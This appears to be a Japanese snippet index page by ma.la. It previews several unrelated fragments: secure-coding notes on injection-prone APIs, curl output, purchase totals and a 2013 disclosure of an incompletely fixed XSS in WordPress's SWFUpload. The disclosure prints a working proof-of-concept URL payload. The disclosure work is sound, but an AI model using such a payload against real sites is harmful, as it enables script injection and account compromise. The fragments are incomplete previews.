スマートフォンのセキュリティについて
ma.la
スマートフォンのセキュリティについて
ma.la
# 私が考える安全なプログラムを書くために必要なこと | |
今も昔も「入力によって挙動が大幅に変わるAPI」が世の中には多数存在していて、プログラマが本来意図した挙動と異なる動作を引き起こしている。 | |
- ファイルを開こうとしたらコマンドを実行できてしまったり | |
- CSSセレクタを書いてるつもりがHTMLタグを生成してしまったり | |
- SELECT文を発行するつもりがDELETE文を発行できてしまったり | |
こういったときに | |
- 入力値検証をしないと危険になる |
window.addEventListener("message", function(e){ console.log(e) }); |
SECCON2013 CTFのスロットマシーン
もう皆すっかり忘れてると思うんだけど、2009年ごろに特定の検索エンジン(具体的にはGoogleね)が、 URLの中にURLが入ってるようなのを一律検索結果から除外するといったことがあった。
既存のURLをパラメータとして受け取って、際限なくコンテンツ生成するようなものは、Googleの検索結果から除外されることになった。 (キャッシュとか変換とか翻訳とかそういうのは自主的にrobots.txtやmetaタグで検索結果から除外されるようにすべきだと思う)
ソーシャルブックマークの場合は、単に変換したり翻訳したりしているわけではなく、付加的な情報があるわけだけど そんなことをわざわざGoogleが特別扱いはしなかった。単にURLの中にURLが入ってるものは除外された。
$ curl -A "Mozilla iPhone like Mac OS X" -I http://www.smartnews.be/s/CuIXI | |
HTTP/1.1 200 OK | |
Content-length: 2657 | |
Content-Type: text/html;charset=UTF-8 | |
Date: Thu, 27 Jun 2013 13:19:57 GMT | |
Server: Apache-Coyote/1.1 | |
Set-Cookie: JSESSIONID=02CD3E97EC187F45AF08FCB9BAABDB25; Path=/; HttpOnly | |
Vary: Accept-Encoding | |
Connection: keep-alive |
あなたは | |
2005年 合計10,488円分 | |
2006年 合計240,565円分 | |
2007年 合計307,968円分 | |
2008年 合計413,407円分 | |
2009年 合計135,520円分 | |
2010年 合計158,169円分 | |
2011年 合計60,435円分 | |
2012年 合計30,120円分 | |
2013年 合計56,181円分 |
概要 | |
WordPressが修正したつもりになってたSWFUploadのXSSの修正方法が不完全で最新版でもまだある。 | |
http://wordpress.org/news/wp-includes/js/swfupload/swfupload.swf#?movieName=SWFUpload_0&buttonText=%26lt%3Ba%20href%3D'javascript%3Aalert(location)'%26gt%3Bclickhere%26lt%3B%2Fa%26gt%3B | |
---- | |
届出ステータス | |
- 2013-04-24 security at wordpress.org | |
- 2013-04-25 IPA, Neal Poole氏 | |
---- |